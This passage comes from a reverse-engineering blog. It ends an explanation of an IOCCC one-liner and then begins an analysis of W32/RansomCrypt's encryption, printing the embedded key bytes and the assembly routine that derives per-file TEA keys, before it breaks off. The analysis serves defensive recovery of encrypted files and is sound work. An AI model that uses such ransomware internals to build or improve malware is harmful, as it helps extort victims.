<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">Let's explain it better: counter / 21 will result in 0 for the first 20 iterations, in 1 for the second 21, and in 2 for the last ones. The result of this sum is then "and-ed" with the value 1 (that is, the "true" resulting from "56 > _ "). </span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">So, in the first line, the counter is left unchanged, and all the even values of the counter and-ed with 1 will return false. Why? Because the number 1 in binary is... well... 1 :).</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">Every multiple of two, instead (that is, every even value of the counter), once translated in binary will correspond to a number that has the least significant bit set to 0. This means that in every iteration where the counter is even the "and" operation will be something like this:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #1e1e1e; font-size: 13px; line-height: 20px;"><span style="font-size: small;">bbbbb0 and</span></span></div>
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #1e1e1e; font-size: 13px; line-height: 20px;"><span style="font-size: small;">000001</span></span></div>
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">where "b" is a bit that can be either 0 or 1. Of course the result of this and will always be false. On the other hand, it will always be true for odd values of the counter (because all odd values have the least significant bit set to 1).</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">BUT! This is only valid for the first line of the output! In the second line the expression "</span></span></span><span style="font-family: 'Courier New', Courier, monospace; font-size: small;">_ / </span><span style="color: #1c00cf; font-family: 'Courier New', Courier, monospace; font-size: small;">21</span><span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">" results in 1, which is then added to the counter.</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">So, the whole thing now works the opposite way: when the counter is even, it is incremented by one and it becomes odd, causing the whole ternary operator to evaluate to true. When it's odd instead, the increment makes it even, causing the ternary operator to evaluate to false, and therefore a space is printed on the screen.</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">Finally, the last line of the output begins with TWO spaces!! How is that possible? Well, the reason is in the chosen number "21"!</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">The output lines infact are aligned on multiples of 20, while the check on alternate spaces is aligned on multiples of 21. This means that the check of alternate spaces is off by one in respect of the alignment of lines.</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">In the third line you start with iteration 41 (well, actually iteration 42 which gets decremented to 41). This value of the counter makes it so that for the line alignment it represents the first element of the third line (the third set of 20), while for the space alignment it is the last element of the second line (the second set of 21).</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">Now the third and most nested operator is left:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<div style="font-family: "Courier New",Courier,monospace; margin-bottom: 0cm;">
<span style="font-size: small;">strchr(</span><span style="color: #1c00cf; font-size: small;">1</span><span style="font-size: small;">[l],
_ ^ </span><span style="color: #c41a16; font-size: small;">"pt`u}rxf~c{wk~zyHHOJ]QULGQ[Z"
</span><span style="font-size: small;">[_/</span><span style="color: #1c00cf; font-size: small;">2</span><span style="font-size: small;">])?
</span><span style="color: #1c00cf; font-size: small;">111
</span><span style="font-size: small;">:
</span><span style="color: #1c00cf; font-size: small;">46</span><br />
<span style="color: #1c00cf; font-size: small;"> </span></div>
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">this is quite simple, but also quite interesting in the notation being used. </span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">First we see it returns the two values 111 or 46 (ascii values for "o" and "."), and correspond respectively to a char that is present and to a char that is not present in the input parameter string.</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">How is the check performed?? Simply with a strchr() function.</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">This function searches for a char in a string, and returns a pointer to that char if it is found, or NULL otherwise (which logically would evaluate respectively to true or false). The first parameter is weird! </span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">We have:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><span style="color: #1c00cf; font-size: small;"> 1</span><span style="font-size: small;">[l]</span><br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="font-size: small;"> </span></div>
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">no, it's not a typo! 1 is the array, and the char **l is the index. How is that possible?? Well, the semantics of the C language allows this weird notation; normally, when using an array, the code would resolve it like this:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="font-size: small;">type array[n] --> array + n*sizeof(type)</span><span style="font-size: small;">
</span></div>
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">in order to calculate the pointer to reach the n-th element in the array. In the case of this IOCCC code, instead, the compiler does this:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">char *test = 1[l];</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">----------------------------------------------<br /> mov eax,dword ptr [ebp+0Ch] ; eax = array address<br /> mov ecx,dword ptr [eax+4] ; ecx = element at address + 4<br /> mov dword ptr [ebp-4],ecx ; element is stored in test</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"><br /></span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">remember that "l" is a char**, meaning that it is an array of pointers, and each element is of size 4. We access element 1, so 1*4 = 4. Therefore even when the index and the array are swapped, we still have</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="font-size: small;">type n[array] -> array + n*sizeof(type)</span><br />
<span style="font-size: small;"> </span></div>
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">that is, the pointer is still calculated and resolved correctly.</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">So this whole 1[l] thing is simply accessing argv[1], that is, the first parameter passed in the command line.</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">Going back to the strchr function, we see another similar trick in the second parameter:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #c41a16; font-size: small;">"pt`u}rxf~c{wk~zyHHOJ]QULGQ[Z"
</span><span style="font-size: small;">[_/</span><span style="color: #1c00cf; font-size: small;">2</span><span style="font-size: small;">]</span></div>
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">this time the trick is more intuitive, the string is treated as an array of chars, and C allows you to use the [] notation to access the elements. This is completely equivalent to the most "normal" form:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #1e1e1e; font-size: 13px; line-height: 20px;"><span style="font-size: small;">char Array[] = </span></span><span style="color: #c41a16; font-size: small;">"pt`u}rxf~c{wk~zyHHOJ]QULGQ[Z"<span style="color: black;">;</span></span></div>
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #1e1e1e; font-size: 13px; line-height: 20px;"><span style="font-size: small;">...</span></span></div>
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #1e1e1e; font-size: 13px; line-height: 20px;"><span style="font-size: small;">char test = Array[_/2];</span></span><br />
<span style="color: #1e1e1e; font-size: 13px; line-height: 20px;"><span style="font-size: small;"> </span></span></div>
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">Ok, we know that the first parameter of the strchr is the string passed in the command line, but what about this second one? We see the counter makes an appearance. It is divided by two because we have seen it prints alternatively characters and spaces. Also, we see the character extracted from the string array is xored with the counter itself! This looks like some sort of partial encryption :P</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">Anyway, at every odd iteration a character is extracted from the above string, and after the xor with the counter it results in the n-th character of the keyboard (qwertyuio... etc). This character is then searched in the input parameter string, and if it is found the character "o" is returned by the ternary operator (and printed on the screen), or else the character "." is returned.</span></span></span><br />
<br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"><span style="color: #274e13;">Riddle</span>: because of the way the loop is calculated, some characters from the above string are skipped and never used, can you figure out which ones?</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">The last, final, question is: which is the condition that stops the loop?</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">The loop is performed through the recursive formula we saw in the beginning:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #1c00cf; font-size: small;">6</span><span style="color: #1a1a1a;"><span style="font-size: small;">*putchar(…)
^ _ && main(</span></span><span style="color: #1c00cf; font-size: small;">2</span><span style="color: #1a1a1a;"><span style="font-size: small;"> + _, l);</span></span><br />
<span style="color: #1a1a1a;"><span style="font-size: small;"> </span></span></div>
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">This is a logical "and": the first part stands for the termination condition, while the second one is the core of the recursion. Both the sides of the formula must evaluate to true in order for the recursion to work; the second part, though<span style="font-family: Verdana, sans-serif;">, only contains the "main" which doesn't return any value.</span></span></span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"> </span></span></span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">So this leaves us with only the first part that controls the iteration: the code will evaluate the first part of the formula, and if it is true it will try and evalute the second part (the "main"), but this part is a function, therefore the code will have to call the function in order to determine whether this function will return true or false. But this function is recursive! Therefore it doesn't matter what the "main" evaluates to, the recursion will cause the code to always follow it in any case.</span></span></span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"> </span></span></span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;">The only way to terminate this loop is when the first part of the formula evaluates to false. This way, the code knows a priori that the second part of the formula can't make a difference, so it will not evaluate it, causing the recursion not to happen.</span></span></span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"><span style="font-family: Verdana, sans-serif;"> </span></span></span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">The first part of the formula is simply:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #1c00cf; font-size: small;">6</span><span style="color: #1a1a1a;"><span style="font-size: small;">*putchar(…)
^ _</span></span></div>
<span style="color: #1a1a1a;"><span style="font-size: small;"> </span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">when is this false? Well, remember that every line of output is of 20 chars? Every time the counter is a multiple of 20 a "\n" is printed (ascii code is 10 decimal).</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">In the last iteration, after the third line, the counter reaches the value 60. This is a multiple of 20, therefore the "\n" is printed by the expression within the "putchar" argument. Also, the printed charater is returned by "putchar" (that is, it returns 10). We see the return value (10) is multiplied by 6, then xored with the counter itself. Let's do the simple math:</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #1e1e1e; font-size: 13px; line-height: 20px;"><span style="font-size: small;">(6*10) ^ 60</span></span></div>
<div style="font-family: "Courier New",Courier,monospace;">
<span style="color: #1e1e1e; font-size: 13px; line-height: 20px;"><span style="font-size: small;"> </span></span></div>
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">the result of this is 0, which logically evaluates to false, so we can see that only when the execution counter reaches the value of 60 the recursion will be interrupted, causing the code to get out of the nested recursions it has done so far, and ultimately terminate the program execution.</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">And that's all for this little one liner: very small code, but dense contents! It is very interesting to analyze tricky codes like this because you find a lot of quirks that you never see in "normal" C source codes, and you also learn a lot about the internal working of the C itself.</span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;"> </span></span></span><br />
<span style="color: #1e1e1e; font-family: 'Helvetica Neue', Arial, sans-serif; font-size: 13px; line-height: 20px;"><span style="font-size: small;"><span style="font-family: Verdana, sans-serif;">My congratulations to the author Taketo Konno for designing this very clever piece of code, which well deserves the "best one liner award" :)</span></span></span><br />
<br />
<br />giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com0tag:blogger.com,1999:blog-8573685359056491736.post-23064068293746599712012-04-20T10:45:00.000-07:002012-05-06T02:44:42.757-07:00RansomCrypt: an analysis of its crypto routines.<br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">About a week ago, I noticed a new crypto ransomware (remember </span><a href="http://en.wikipedia.org/wiki/PGPCoder"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">gpcode</span></a><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">?): </span><i><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">W32/RansomCrypt</span></i><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">. The news came from the </span><a href="http://www.f-secure.com/weblog/archives/00002347.html"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">F-Secure website</span></a><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">. So, as soon as I gathered a sample I started my analysis, but just when I was about to finish it... A twitter update told me that F-Secure had already done the work with the </span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><a href="http://www.f-secure.com/weblog/archives/00002349.html">decryption script</a>!</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Anyway here you can find some additional details about the encryption/decryption and the way it works.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">The first executable I came across was coded in Visual Basic and was packed with a modified UPX version.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">After unpacking the sample, I started searching for standard encryption routines, but nothing caught my attention. However the sample did contain encrypted data, and debugging some routines that looked like home made decryption code, I ended up finding a second encrypted executable within the first one.</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Luckily, this second executable wasn't coded in Visual Basic (if you have tried to reverse some VB executable you know what I mean!), this one was also packed, but with standard UPX. Again, I unpacked it and began searching for some encryption routines. I found three candidates: a 16-bytes xor, and two TEA routines (both encryption and decryption).</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">(If you haven't ever reversed TEA, here's a little trick to recognize it: in most cases you just have to look for the magic constant </span><span class="Apple-style-span" style="color: #274e13;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">0x9E3779B9</span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> and the work is done.)</span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">I also noticed some interesting APIs: FindResource, SizeofResource, LoadResource, LockResource. They made me look into the resources of the file, where I found an encrypted block. Once decrypted, this block revealed the malware configuration.</span><br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjywP0t7cm5y_o4YfXWmJhjF8qnbuaOfB3jyetDRKUV2SvSsQ0ulUtbxvjuMSwCbkybPpweAunyrcaCopYM5-JusQw3mFZJSOKUGijafBjTTlOWDj_BuoOE7JqXP0JWGzlL3lXLuYj4GWk/s1600/shot2.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjywP0t7cm5y_o4YfXWmJhjF8qnbuaOfB3jyetDRKUV2SvSsQ0ulUtbxvjuMSwCbkybPpweAunyrcaCopYM5-JusQw3mFZJSOKUGijafBjTTlOWDj_BuoOE7JqXP0JWGzlL3lXLuYj4GWk/s1600/shot2.bmp" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">To decrypt the configuration, I debugged this decryption routine and found out that the first 16 bytes of the resource were the key for the decryption of the configuration block. The decryption algorithm was the 16-bytes xor routine I had noted earlier.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Then I noticed a loop scanning for all the files in the system, and I thought that it was probably the same that also encrypted them.</span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: left;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">I set a breakpoint there, and followed the key generation algorithm: the malware uses the same key employed to decrypt the configuration block, but it changes the endianness of every dword.</span></div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><br />
<div>
<div>
<b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Key from the resource section:</span></b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><span class="Apple-style-span" style="color: #274e13;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">4A 2E 94 46 60 64 85 5B 5A 86 89 8C 7F 63 6C 50</span></span></div>
<div>
<b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Key with swapped endianness:</span></b><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> </span><span class="Apple-style-span" style="color: #274e13;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">46 94 2E 4A 5B 85 64 60 8C 89 86 5A 50 6C 63 7F</span></span></div>
</div>
<div>
<span class="Apple-style-span" style="color: #274e13;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">This key, combined with the first byte of the targeted filename, leads to the final encryption key that will be used with TEA.</span></div>
<div>
<div>
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><br />
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov dl, [eax] ; get first </span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">char</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> from filename</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov ecx, </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">h</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov esi, offset BaseKey</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov edi, offset GeneratedKey</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 13.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> KeyGeneration:</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> lodsb</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> xor al, dl</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> rol dl, </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1</span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> stosb</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> loop KeyGeneration</span></span></div>
</div>
</div>
<div>
<span class="Apple-style-span" style="color: #274e13;"><br /></span></div>
<div>
<div>
<br />
Or in C, in you prefer:<br />
